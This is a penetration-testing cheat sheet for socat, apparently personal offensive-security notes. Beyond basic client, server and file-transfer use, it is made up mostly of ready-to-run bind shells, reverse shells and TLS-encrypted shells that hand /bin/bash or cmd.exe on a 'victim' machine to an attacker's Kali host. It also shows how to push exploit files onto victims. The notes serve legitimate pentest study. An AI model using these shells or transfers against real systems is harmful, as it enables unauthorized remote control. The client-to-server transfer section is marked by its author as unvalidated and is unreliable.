Socat

Socat is a command line based utility that establishes two bidirectional byte streams and transfers data between them. Similar to Netcat but supports encryption.

Client Mode
Server Mode
File Transfer
Bind Shell
Reverse Shell

Help

socat -h
socat -hh
socat -hhh
man socat

Client Mode

Connect to a TCP port 

IP=x.x.x.x
PORT=443
socat - TCP4:$IP:$PORT

NOTE: There is no feedback.

💡 For interacting with a specific service, see Ports & Protocols

Server Mode (listen)

💡 Use sudo for port numbers < 1024

sudo socat TCP4-LISTEN:443 STDOUT

File Transfer

Transfer file – From Server to Client

Server mode (e.g. Kali)

Anyone who connects to this port will receive the file.

sudo socat TCP4-LISTEN:443,fork file:~/exploit.py

Client mode (e.g. victim machine)

socat TCP4:$IP:443 file:received_exploit.py,create

Transfer file – From Client to Server

❗ Tentative, to validate 😉 Says connection refused but file was created.

Server mode (e.g. Kali)

sudo socat TCP4-LISTEN:443 file:~/received_exploit.py,create

Client mode (e.g. victim machine)

socat TCP4:$IP:443,fork file:~/exploit.py,create

Bind Shell

Client –> Bind shell –> Server

Server mode (Victim)

sudo socat TCP4-LISTEN:443,fork EXEC:/bin/bash   # Linux
socat TCP4-LISTEN:443,fork EXEC:cmd.exe,pipes    # Windows

Client mode (Kali)

socat - TCP4:$IP:443

Encrypted Bind Shell

Server mode (Victim)

# Generate certificate for encryption, if applicable
openssl req -newkey rsa:2048 -nodes -keyout socat.key -x509 -days 362 -out socat.crt
cat socat.key socat.crt > socat.pem
sudo socat OPENSSL-LISTEN:443,cert=socat.pem,verify=0,fork EXEC:/bin/bash  # Linux
socat OPENSSL-LISTEN:443,cert=socat.pem,verify=0,fork EXEC:cmd.exe,pipes   # Windows

Client mode (Kali)

socat - OPENSSL:$IP:443,verify=0

Reverse Shell

Send a command shell to a host listening on a port.

Server mode (Kali)

-d -d: verbose

sudo socat -d -d TCP4-LISTEN:443 STDOUT

Client mode (Victim sends reverse shell to Kali)

socat TCP4:$IP:443 EXEC:/bin/bash       # Linux
socat TCP4:$IP:443 EXEC:cmd.exe,pipes   # Windows

💡 If netcat is not available on victim’s machine, use other reverse shells. Also see the reverse shell cheat sheet from HighOnCoffee.

Encrypted Reverse Shell

Server mode (Kali)

# Generate certificate for encryption, if applicable
openssl req -newkey rsa:2048 -nodes -keyout socat.key -x509 -days 362 -out socat.crt
cat socat.key socat.crt > socat.pem
sudo socat -d -d OPENSSL-LISTEN:443,cert=socat.pem,verify=0 STDOUT

Client mode (Victim sends reverse shell to Kali)

socat OPENSSL:$IP:443,verify=0 EXEC:/bin/bash      # Linux
socat OPENSSL:$IP:443,verify=0 EXEC:cmd.exe,pipes  # Windows